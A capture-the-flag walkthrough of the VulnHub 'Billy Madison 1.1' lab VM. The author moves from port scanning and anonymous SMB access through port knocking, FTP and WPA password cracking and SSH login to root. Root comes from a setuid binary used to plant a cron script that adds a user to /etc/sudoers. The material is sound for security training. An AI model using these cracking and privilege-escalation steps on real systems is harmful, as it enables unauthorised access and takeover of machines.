[VulnHub] Billy Madison 1.1

“Objective: The primary objective of the VM is to figure out how Eric took over the machine and then undo his changes so you can recover Billy’s 12th grade final project. You will probably need to root the box to complete this objective.” – Brian Johnson

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.128/24)

Target: Billy Madison 1.1 (10.1.1.129/24)

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address.

1
2
3
4
5
6
7
8
9
10
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:f1:61:7e   VMware, Inc.
10.1.1.129    00:0c:29:84:da:45   VMware, Inc.
10.1.1.250    00:50:56:f9:1b:7d   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.425 seconds (105.57 hosts/sec). 4 responded

10.1.1.129 is our Target!

Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~# masscan -p1-65535 10.1.1.129/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-12-12 11:05:27 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 10.1.1.129
Discovered open port 23/tcp on 10.1.1.129
Discovered open port 139/tcp on 10.1.1.129
Discovered open port 69/tcp on 10.1.1.129
Discovered open port 445/tcp on 10.1.1.129
Discovered open port 2525/tcp on 10.1.1.129
Discovered open port 22/tcp on 10.1.1.129
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
... turncated ...
Nmap scan report for 10.1.1.129
Host is up (0.00032s latency).
PORT     STATE SERVICE     VERSION
22/tcp   open  tcpwrapped
23/tcp   open  telnet?
69/tcp   open  http        BaseHTTPServer
|_http-generator: WordPress 1.0
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: MadisonHotelsWordpress
|_http-title: Welcome | Just another WordPress site
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Oh nooooooo!
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
2525/tcp open  smtp
| smtp-commands: BM, 8BITMIME, AUTH LOGIN, Ok,
|_ SubEthaSMTP null on BM Topics: HELP HELO RCPT MAIL DATA AUTH EHLO NOOP RSET VRFY QUIT STARTTLS For more info use "HELP <topic>". End of HELP info
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port23-TCP:V=7.31%I=7%D=12/12%Time=584E8537%P=x86_64-pc-linux-gnu%r(NUL
SF:L,E6,"\n\n\*\*\*\*\*\x20HAHAH!\x20You're\x20banned\x20for\x20a\x20while
SF:,\x20Billy\x20Boy!\x20\x20By\x20the\x20way,\x20I\x20caught\x20you\x20tr
SF:ying\x20to\x20hack\x20my\x20wifi\x20-\x20but\x20the\x20joke's\x20on\x20
SF:you!\x20I\x20don't\x20use\x20ROTten\x20passwords\x20like\x20rkfpuzrahng
SF:vat\x20anymore!\x20Madison\x20Hotels\x20is\x20as\x20good\x20as\x20MINE!
SF:!!!\x20\*\*\*\*\*\n\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2525-TCP:V=7.31%I=7%D=12/12%Time=584E853D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,1F,"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n")%r(GetRequest,5A
SF:,"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n500\x20Error:\x20command
SF:\x20not\x20implemented\r\n500\x20Error:\x20bad\x20syntax\r\n")%r(Generi
SF:cLines,4D,"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n500\x20Error:\x
SF:20bad\x20syntax\r\n500\x20Error:\x20bad\x20syntax\r\n")%r(Help,13D,"220
SF:\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n214-SubEthaSMTP\x20null\x20on
SF:\x20BM\r\n214-Topics:\r\n214-\x20\x20\x20\x20\x20HELP\r\n214-\x20\x20\x
SF:20\x20\x20HELO\r\n214-\x20\x20\x20\x20\x20RCPT\r\n214-\x20\x20\x20\x20\
SF:x20MAIL\r\n214-\x20\x20\x20\x20\x20DATA\r\n214-\x20\x20\x20\x20\x20AUTH
SF:\r\n214-\x20\x20\x20\x20\x20EHLO\r\n214-\x20\x20\x20\x20\x20NOOP\r\n214
SF:-\x20\x20\x20\x20\x20RSET\r\n214-\x20\x20\x20\x20\x20VRFY\r\n214-\x20\x
SF:20\x20\x20\x20QUIT\r\n214-\x20\x20\x20\x20\x20STARTTLS\r\n214-For\x20mo
SF:re\x20info\x20use\x20\"HELP\x20<topic>\"\.\r\n214\x20End\x20of\x20HELP\
SF:x20info\r\n");
MAC Address: 00:0C:29:84:DA:45 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: OpenBSD 4.X
OS CPE: cpe:/o:openbsd:openbsd:4.4
OS details: OpenBSD 4.4
Network Distance: 1 hop
Service Info: Host: BM

Host script results:
|_clock-skew: mean: 6s, deviation: 0s, median: 6s
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: bm
|   NetBIOS computer name: BM
|   Domain name:
|   FQDN: bm
|_  System time: 2016-12-12T05:09:11-06:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 10.1.1.129

NSE: Script Post-scanning.
Initiating NSE at 06:09
Completed NSE at 06:09, 0.00s elapsed
Initiating NSE at 06:09
Completed NSE at 06:09, 0.00s elapsed
Post-scan script results:
| clock-skew:
|_  6s: Majority of systems scanned
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.96 seconds
           Raw packets sent: 48 (4.616KB) | Rcvd: 16 (656B)

Well, from the result of nmap, there are multiple vectors/ports are interesting, and I choose to test smb first.

Then I use nmap with script smb-enum-shares.nse to enumerate shares.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
root@kali:~# nmap -v --script smb-enum-shares.nse -p445 10.1.1.129

Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-12 06:26 EST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:26
Completed NSE at 06:26, 0.00s elapsed
Initiating ARP Ping Scan at 06:26
Scanning 10.1.1.129 [1 port]
Completed ARP Ping Scan at 06:26, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:26
Completed Parallel DNS resolution of 1 host. at 06:26, 0.00s elapsed
Initiating SYN Stealth Scan at 06:26
Scanning 10.1.1.129 [1 port]
Discovered open port 445/tcp on 10.1.1.129
Completed SYN Stealth Scan at 06:26, 0.04s elapsed (1 total ports)
NSE: Script scanning 10.1.1.129.
Initiating NSE at 06:26
Completed NSE at 06:26, 13.32s elapsed
Nmap scan report for 10.1.1.129
Host is up (0.00023s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:84:DA:45 (VMware)

Host script results:
| smb-enum-shares:
|   account_used: guest
|   EricsSecretStuff:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\WeaselLaugh
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (BM)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

NSE: Script Post-scanning.
Initiating NSE at 06:26
Completed NSE at 06:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.79 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Here I found that EricsSecretStuff can be access/write anonymously!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# smbclient \\\\10.1.1.129\\EricsSecretStuff\\
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Mon Dec 12 17:03:27 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       35  Mon Dec 12 17:03:27 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

      30291996 blocks of size 1024. 25919088 blocks available
smb: \> get ebd.txt
getting file \ebd.txt of size 35 as ebd.txt (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \> exit

Download the file ebd.txt and read it:

1
2
root@kali:~/myTest/BillyMadison1.1# cat ebd.txt
Erics backdoor is currently CLOSED

Ok, looks like I need to find a way to active the backdoor.

Now I back to port 23, try to telnet to the target.

1
2
3
4
5
6
7
8
9
root@kali:~# telnet 10.1.1.129 23
Trying 10.1.1.129...
Connected to 10.1.1.129.
Escape character is '^]'.


***** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****

Connection closed by foreign host.

Nothing special found here, but take notes that the target used to use ROT-10 cipher with potential key rkfpuzrahngvat.

Then I use python script to generate all the ROT strings:

1
2
3
4
5
6
7
root@kali:~/myTest/BillyMadison1.1# cat rot.py 
#!/usr/bin/python

from string import *
import sys
for n in range (26):
  print translate(sys.argv[1],maketrans(lowercase, lowercase[n:]+lowercase[:n]))

Alternatively, here is an online tool

And then run the script with parameter rkfpuzrahngvat, and save the result to file rot-rst.txt:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@kali:~/myTest/BillyMadison1.1# ./rot.py "rkfpuzrahngvat" | tee rot-rst.txt
rkfpuzrahngvat
slgqvasbiohwbu
tmhrwbtcjpixcv
unisxcudkqjydw
vojtydvelrkzex
wpkuzewfmslafy
xqlvafxgntmbgz
yrmwbgyhouncha
zsnxchzipvodib
atoydiajqwpejc
bupzejbkrxqfkd
cvqafkclsyrgle
dwrbgldmtzshmf
exschmenuating
fytdinfovbujoh
gzuejogpwcvkpi
havfkphqxdwlqj
ibwglqiryexmrk
jcxhmrjszfynsl
kdyinsktagzotm
lezjotlubhapun
mfakpumvcibqvo
ngblqvnwdjcrwp
ohcmrwoxekdsxq
pidnsxpyfletyr
qjeotyqzgmfuzs

Then I noticed that a WordPress site is running on port 69, so I use wpscan to do a quick scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
root@kali:~/myTest/BillyMadison1.1# wpscan -u http://10.1.1.129:69/
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

The plugins directory 'wp-content/plugins' does not exist.
You can specify one per command line option (don't forget to include the wp-content directory if needed)
[?] Continue? [Y]es [N]o, default: [N]
Y
[+] URL: http://10.1.1.129:69/
[+] Started: Mon Dec 12 06:46:45 2016

[!] The WordPress 'http://10.1.1.129:69/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: MadisonHotelsWordpress
[+] XML-RPC Interface available under: http://10.1.1.129:69/xmlrpc.php

[+] WordPress version 1.0 (Released on 2004-01-03) identified from meta generator, readme

[+] WordPress theme in use: twentyeleven

[+] Name: twentyeleven
 |  Latest version: 2.5
 |  Location: http://10.1.1.129:69/wp-content/themes/twentyeleven/
 |  Readme: http://10.1.1.129:69/wp-content/themes/twentyeleven/readme.txt
 |  Changelog: http://10.1.1.129:69/wp-content/themes/twentyeleven/changelog.txt
 |  Style URL: http://10.1.1.129:69/wp-content/themes/twentyeleven/style.css
 |  Referenced style.css: http://10.1.1.129:69/static/wp-content/themes/twentyeleven/style.css

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Mon Dec 12 06:46:45 2016
[+] Requests Done: 66
[+] Memory used: 15.719 MB
[+] Elapsed time: 00:00:00

Nothing found. :`(

So I moving to port 80 and there is no clue found on the home page but 3 pics, nothing found in the source code as well.

Then I donwloaded the three images and using exiftool to check if anything hidden in them, but no luck.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@kali:~/myTest/BillyMadison1.1# wfuzz -c --hc=404 -z file,/root/myTest/BillyMadison1.1/rot-rst.txt http://10.1.1.129/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://10.1.1.129/FUZZ
Total requests: 26

==================================================================
ID    Response   Lines      Word         Chars          Request
==================================================================

00008:  C=301      9 L         28 W       317 Ch     "exschmenuating"

Total time: 1.990103
Processed Requests: 26
Filtered Requests: 25
Requests/sec.: 13.06464

Great, found one interesting string exschmenuating.

From this page, firstly, I got clues that veronica would be a part of the password, so I filtered out all the word which including veronica from the famous wordlist file rockyou.txt.

1
2
3
root@kali:~/myTest/BillyMadison1.1# grep 'veronica' /usr/share/wordlists/rockyou.txt > pass.lst
root@kali:~/myTest/BillyMadison1.1# cat pass.lst | wc -l
773

Also, there should be a ‘.captured’ file (which mostly is ended by .cap) in the folder and veronica is part of the file name. So I run wfuzz again to search the captured file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@kali:~/myTest/BillyMadison1.1# wfuzz -c --hc=404 -z file,/root/myTest/BillyMadison1.1/pass.lst http://10.1.1.129/exschmenuating/FUZZ.cap
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://10.1.1.129/exschmenuating/FUZZ.cap
Total requests: 773

==================================================================
ID    Response   Lines      Word         Chars          Request
==================================================================

00522:  C=400     10 L         35 W       302 Ch     "veronica$%"
00716:  C=200    192 L        722 W      8700 Ch     "012987veronica"
00726:  C=200     24 L        162 W      1080 Ch     "#0104veronica"

Total time: 1.617280
Processed Requests: 773
Filtered Requests: 770
Requests/sec.: 477.9627

Then donwloaded the captured file http://10.1.1.129/exschmenuating/012987veronica.cap.

1
2
3
4
5
6
RE: VIRUS ALERT!
Eric,
Thanks for your message. I tried to download that file but my antivirus blocked it.
Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.
https://www.youtube.com/watch?v=z5YU7JwVy7s
QUIT

Here I know that the FTP is turned off by default, and need port knocking to activate it. By checking the Youtube video, I got the port knock sequence: 1466, 67, 1469 ,1514, 1981, 1986, 1588.

1
for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.1.1.129; done

After knocking the ports, I use nmap to check if the FTP open:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@kali:~/myTest/BillyMadison1.1# nmap -p21 -v 10.1.1.129

Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-13 06:38 EST
Initiating ARP Ping Scan at 06:38
Scanning 10.1.1.129 [1 port]
Completed ARP Ping Scan at 06:38, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:38
Completed Parallel DNS resolution of 1 host. at 06:38, 0.00s elapsed
Initiating SYN Stealth Scan at 06:38
Scanning 10.1.1.129 [1 port]
Discovered open port 21/tcp on 10.1.1.129
Completed SYN Stealth Scan at 06:38, 0.05s elapsed (1 total ports)
Nmap scan report for 10.1.1.129
Host is up (0.00040s latency).
PORT   STATE SERVICE
21/tcp open  ftp
MAC Address: 00:0C:29:84:DA:45 (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
root@kali:~/myTest/BillyMadison1.1#

Great, now the port 21 is open.

From the next email, I found the FTP login information:

1
2
3
4
5
6
7
Eric,
Thanks for your message. I tried to download that file but my antivirus blocked it.
Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.


Veronica,
Thanks that will be perfect.  Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

Take a note here, the eric’s FTP login eric/ericdoesntdrinkhisownpee

Now I login to the FTP as eric:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@kali:~/myTest/BillyMadison1.1# ftp 10.1.1.129
Connected to 10.1.1.129.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (10.1.1.129:root): eric
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773
-rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054
-rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049
-rwxrwxrwx 1 ftp 868 Sep 01 10:42 .notes
-rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772
-rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129
226 Transfer completed.

I then downloaded all the files here.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@kali:~/myTest/BillyMadison1.1/eric_ftp# cat .notes
Ugh, this is frustrating.

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(. 
To make matters worse, my privesc exploits aren't working.
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) 
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.

-EG

By checking the youtube video, I got the sentence would be My kid will be a soccer player

then I telnet to port 2525 for SMTP server and send the email to veronica:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@kali:~/myTest/BillyMadison1.1# telnet 10.1.1.129 2525
Trying 10.1.1.129...
Connected to 10.1.1.129.
Escape character is '^]'.
220 BM ESMTP SubEthaSMTP null
EHLO kali
250-BM
250-8BITMIME
250-AUTH LOGIN
250 Ok
MAIL FROM:eric@madisonhotels.com
250 Ok
RCPT TO:vvaughn@polyfector.edu
250 Ok
DATA
354 End data with <CR><LF>.<CR><LF>

SUBJECT: email

My kid will be a soccer player


.
250 Ok
421 Timeout waiting for data from client.
Connection closed by foreign host.

After the email sent, I connected back to the smb shared folder to check the file ebd.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@kali:~/myTest/BillyMadison1.1# smbclient //10.1.1.129/EricsSecretStuff
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Dec 13 08:09:29 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  131216070929482.eml                 N       96  Tue Dec 13 08:09:29 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  131216070428392.eml                 N      267  Tue Dec 13 08:04:28 2016
  ebd.txt                             N       53  Tue Dec 13 08:10:01 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

      30291996 blocks of size 1024. 25921952 blocks available
smb: \> get ebd.txt
getting file \ebd.txt of size 53 as ebd.txt (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \>


root@kali:~/myTest/BillyMadison1.1# cat ebd.txt
2016-12-13-07-11-01
Erics backdoor is currently OPEN

so now, the backdoor is OPEN.

Then do a quick ports scan by using tool masscan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~/myTest/BillyMadison1.1# masscan -p1-65535 10.1.1.129/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-12-13 13:08:00 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 69/tcp on 10.1.1.129
Discovered open port 21/tcp on 10.1.1.129
Discovered open port 139/tcp on 10.1.1.129
Discovered open port 80/tcp on 10.1.1.129
Discovered open port 23/tcp on 10.1.1.129
Discovered open port 1974/tcp on 10.1.1.129
Discovered open port 2525/tcp on 10.1.1.129
Discovered open port 22/tcp on 10.1.1.129
Discovered open port 445/tcp on 10.1.1.129

Compared with previouse scanning result, the new port is 1974, and then I use nmap to do a deeper scan on port 1974, and found that SSH is running on it.

1
2
3
4
5
6
7
8
root@kali:~/myTest/BillyMadison1.1# nmap -v -p1974 -sV 10.1.1.129

...turncated...
PORT     STATE SERVICE VERSION
1974/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:84:DA:45 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...turncated...

Next, from the previouse clues, veronica should have a FTP account, I then try to find the password by using ncrack / medusa with the wordlist pass.lst which is generated before from rockyou.txt.

1
2
3
4
5
6
7
8
9
10
root@kali:~/myTest/BillyMadison1.1# ncrack -u veronica -P pass.lst -T 5 10.1.1.129 -p 21

Starting Ncrack 0.5 ( http://ncrack.org ) at 2016-12-13 08:13 EST

Discovered credentials for ftp on 10.1.1.129 21/tcp:
10.1.1.129 21/tcp ftp: 'veronica' 'babygirl_veronica07@yahoo.com'

Ncrack done: 1 service scanned in 189.04 seconds.

Ncrack finished.

Great, now I login to the ftp as veronica and found there are 2 files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali:~/myTest/BillyMadison1.1/veronica-ftpfolder# ftp 10.1.1.129 21
Connected to 10.1.1.129.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (10.1.1.129:root): veronica
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml
-rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap
g226 Transfer completed.

Downloaded all of them, and check the email first:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@kali:~/myTest/BillyMadison1.1/veronica-ftpfolder# cat email-from-billy.eml
        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. :-)

Kisses,

Billy

Also, the other file is a cap file which sure enough is the wireless handshake traffic file. so I fire up aircrack-ng with rockyou.txt to crack the wireless password:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@kali:~/myTest/BillyMadison1.1/veronica-ftpfolder# aircrack-ng -w /usr/share/wordlists/rockyou.txt eg-01.cap
Opening eg-01.cap
Read 13003 packets.

   #  BSSID              ESSID                     Encryption

   1  02:13:37:A5:52:2E  EricGordon                WPA (1 handshake)

Choosing first network as target.

Opening eg-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc4

      [00:18:52] 1699632/9822768 keys tested (1637.45 k/s)

      Time left: 1 hour, 22 minutes, 42 seconds                 17.30%

                           KEY FOUND! [ triscuit* ]


      Master Key     : 9E 8B 4F E6 CC 5E E2 4C 46 84 D2 AF 59 4B 21 6D
                       B5 3B 52 84 04 9D D8 D8 83 67 AF 43 DC 60 CE 92

      Transient Key  : 7A FA 82 59 5A 9A 23 6E 8C FB 1D 4B 4D 47 BE 13
                       D7 AC AC 4C 81 0F B5 A2 EE 2D 9F CC 8F 05 D2 82
                       BF F4 4E AE 4E C9 ED EA 31 37 1E E7 29 10 13 92
                       BB 87 8A AE 70 95 F8 62 20 B5 2B 53 8D 0C 5C DC

      EAPOL HMAC     : 86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33
root@kali:~/myTest/BillyMadison1.1/veronica-ftpfolder#

Great! now I would be able to login as Eric via the backdoor port 1974

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@kali:~/myTest/BillyMadison1.1# ssh eric@10.1.1.129 -p 1974
eric@10.1.1.129's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

37 packages can be updated.
0 updates are security updates.


Last login: Sat Aug 20 22:28:28 2016 from 192.168.3.101
eric@BM:~$ id
uid=1002(eric) gid=1002(eric) groups=1002(eric)
eric@BM:~$ pwd
/home/eric
eric@BM:~$ ls -la
total 532
drwxr-xr-x 3 eric eric   4096 Aug 23 00:18 .
drwxr-xr-x 6 root root   4096 Aug 20 13:56 ..
-rw-r--r-- 1 eric eric    220 Aug 20 13:56 .bash_logout
-rw-r--r-- 1 eric eric   3771 Aug 20 13:56 .bashrc
drwx------ 2 eric eric   4096 Aug 20 14:07 .cache
-rw-r--r-- 1 root root 451085 Aug  7 22:31 eric-tongue-animated.gif
-rw-r--r-- 1 root root  60710 Aug  7 22:29 eric-unimpressed.jpg
-rw-r--r-- 1 eric eric    655 Aug 20 13:56 .profile
-rw-r--r-- 1 root root    115 Aug 20 20:41 why-1974.txt
eric@BM:~$ uname -a
Linux BM 4.4.0-36-generic #55-Ubuntu SMP Thu Aug 11 18:01:55 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
eric@BM:~$ 

Now I’m in.

Then I did enumeration and preperation for rooting.

However, both LinEnum.sh and linuxprivchecker.py have not give me any positive suggestion to priv escalation.

Then I followed the g0tm1lk’s basic linux privilege escalation, and found a program file which sticky bit is set.

1
2
3
eric@BM:/etc/cron.hourly# find / -perm -g=s -perm -u=s -type f -ls 2>/dev/null
  1454477    368 -r-sr-s---   1 root     eric       372922 Aug 20 22:35 /usr/local/share/sgml/donpcgd
  1058032     52 -rwsr-sr-x   1 daemon   daemon      51464 Jan 14  2016 /usr/bin/at

By checking with the target program /usr/local/share/sgml/donpcgd.

1
2
3
4
5
6
7
eric@BM:~# /usr/local/share/sgml/donpcgd
Usage: /usr/local/share/sgml/donpcgd path1 path2

eric@BM:~# /usr/local/share/sgml/donpcgd /etc/shadow /tmp/shadow
#### mknod(/tmp/shadow,81a0,0)
eric@BM:~# ls -al /tmp/shadow
-rw-r----- 1 root shadow 0 Jan  7 04:55 /tmp/shadow

This program will copy the file in path1 to path2 (only name is same, but the content will not be copied. the new file is empty.)

so that means, I can create file to any location by taking advantage of this program.

Then I created a cron.hourly entry which including a bash script to add eric into the sudoers.

1
2
3
4
5
6
7
8
eric@BM:~$ touch /tmp/rootme
eric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/rootme /etc/cron.hourly/rootme
#### mknod(/etc/cron.hourly/rootme,81b4,0)
eric@BM:~$ echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/rootme
eric@BM:~$ chmod +x /etc/cron.hourly/rootme
eric@BM:~$ cat /etc/cron.hourly/rootme
#!/bin/bash
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

After 1 hour waiting, I try to check if the rootme is executed correctly by using command sudo su.

1
2
3
4
eric@BM:~$ sudo su
root@BM:/home/eric# id
